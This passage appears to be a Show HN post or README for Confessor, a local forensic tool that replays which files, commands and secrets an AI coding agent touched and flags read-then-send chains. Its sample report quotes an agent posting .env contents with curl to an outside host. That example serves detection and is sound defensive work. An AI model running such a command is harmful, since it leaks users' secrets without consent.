Show HN: Confessor – replay what private info Claude Code accessed on your PC A developer released Confessor, an open-source tool that reconstructs the history of AI coding agents like Claude Code from local session logs to reveal every file read, command run, and secret accessed, flagging potential data exfiltration chains. The tool runs after the fact with no daemon or network calls, and also scans ChatGPT, Claude, and Gemini exports for exposed secrets. See what your AI coding agent actually did on your computer. You've been letting an AI coding agent run on your computer. Claude Code, and the ones like it, can read any file your user account can — your .env , your ~/.ssh keys, your browser's saved passwords, that folder of tax PDFs — and they can also run shell commands and reach the network. Most of the time they do exactly what you asked. But you don't actually know that. You know it finished the task. Confessor tells you what it did. It reconstructs the agent's whole history from the session logs already sitting on your disk — every file it opened, every command it ran, every secret that passed through its context, and everywhere it could have sent data — and it flags the thing you actually care about: a sensitive file read, followed by a network call in the same session. Data in, a way out, right after. Here's the moment that made me build this. From the sample report https://ninjahawk.github.io/Confessor/ generated from planted fake data, so it's safe to publish : The agent read .env — three live keys inside — and fifteen seconds later ran curl -X POST … -d @.env to a host that isn't yours. This is not proof anything was stolen. It's a lead, and it's exactly the question you can't answer today: did my stuff leave? Confessor surfaces every instance and lets you judge. It also just lists, plainly, every sensitive file the agent opened and why each one stands out: The tools in this space are compliance loggers — you wrap the agent, they stream events to a dashboard, you read audit trails. Confessor is the opposite: nothing to install alongside the agent, nothing running, no daemon. The logs are already on your disk. You run one command, after the fact, and get the forensic picture — including the read-then-exfiltrate chains, which the loggers don't connect for you. And it makes zero network calls itself, which is the only honest way to ship a tool whose whole job is telling you what touched your secrets. The same detection engine runs over your ChatGPT, Claude, and Gemini exports — every API key you pasted at 2am, every phone number, every salary negotiation and medical question — and grades how much you've handed to each provider, with plain instructions to rotate and delete. It's the same "oh no" in a different place. I ran it on my own history and got an F. You need Node ≥ 18.17. Then: npx confessor With no arguments it finds your local Claude Code logs ~/.claude/projects , reconstructs what the agent did, scans the content, writes confessor-report.html , and opens it. To include your chat services, download an export and point at it: | Source | Where to get it | Then | |---|---|---| | Claude Code | already on your disk | npx confessor | | ChatGPT | chatgpt.com → Settings → Data controls → Export data | npx confessor ~/Downloads/chatgpt-export.zip | | Claude | claude.ai → Settings → Privacy → Export data | npx confessor ~/Downloads/claude-export.zip | | Gemini | takeout.google.com → "My Activity" | npx confessor ~/Downloads/Takeout | Flags: --json machine-readable , --out